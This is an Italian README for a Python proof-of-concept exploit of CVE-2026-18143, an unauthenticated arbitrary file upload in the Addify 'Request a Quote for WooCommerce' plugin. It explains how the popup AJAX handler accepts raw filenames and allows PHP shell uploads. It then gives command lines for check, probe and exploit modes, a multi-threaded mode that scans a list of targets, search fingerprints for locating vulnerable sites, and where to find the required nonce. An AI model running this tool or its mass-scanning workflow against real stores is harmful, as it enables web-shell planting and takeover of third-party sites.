
PoC Python che verifica e sfrutta CVE-2026-18143, un caricamento arbitrario di file non autenticato in Addify Request a Quote for WooCommerce ≤ 2.9.2 tramite il gestore AJAX del popup.
PoC in Python 3 per CVE-2026-18143 in Request a Quote for WooCommerce (woocommerce-request-a-quote, Addify / WooCommerce.com).
CVE-2026-18143 — Request a Quote for WooCommerce ≤ 2.9.2 consente il caricamento arbitrario di file non autenticato (CWE-434, CVSS 9.8 Critico) tramite afrfq_submit_quote_via_popup(). Il gestore del popup chiama move_uploaded_file() utilizzando il nome file grezzo fornito dal client senza allowlist di estensioni o MIME, scrivendo in una directory temporanea di caricamento RFQ accessibile via web. Gli attaccanti possono caricare shell .php quando una regola di preventivo pubblica utilizza il flusso popup multi-pagina. Corretto in > 2.9.2.
Pagina PoC: https://pocbit.org/pocs/cve-2026-18143
Catalogo: https://pocbit.org/pocs/
| Prodotto | Request a Quote for WooCommerce (Addify) |
| Percorso plugin | wp-content/plugins/woocommerce-request-a-quote/ |
| Affetto | ≤ 2.9.2 |
| AJAX | action=afrfq_submit_quote_via_popup → admin-ajax.php |
| Prerequisito | Regola di preventivo popup abilitata sullo storefront |
pip install -r requirements.txt
python poc.py -u https://shop.example --mode check
python poc.py -u https://shop.example --mode check --upload-probe
python poc.py -u https://shop.example --mode exploit --nonce YOUR_NONCE --verify
python poc.py -u https://shop.example --mode exploit --page /shop/ --verify
python poc.py --list targets.example.txt --mode check -j 15
Il nonce si trova solitamente nel JS front-end (oggetto localizzato afrfq) sulle pagine shop/prodotto quando il popup del preventivo è attivo.
body="/wp-content/plugins/woocommerce-request-a-quote/"
body="afrfq"
Solo test autorizzati. --upload-probe / --mode exploit scrivono file sul target.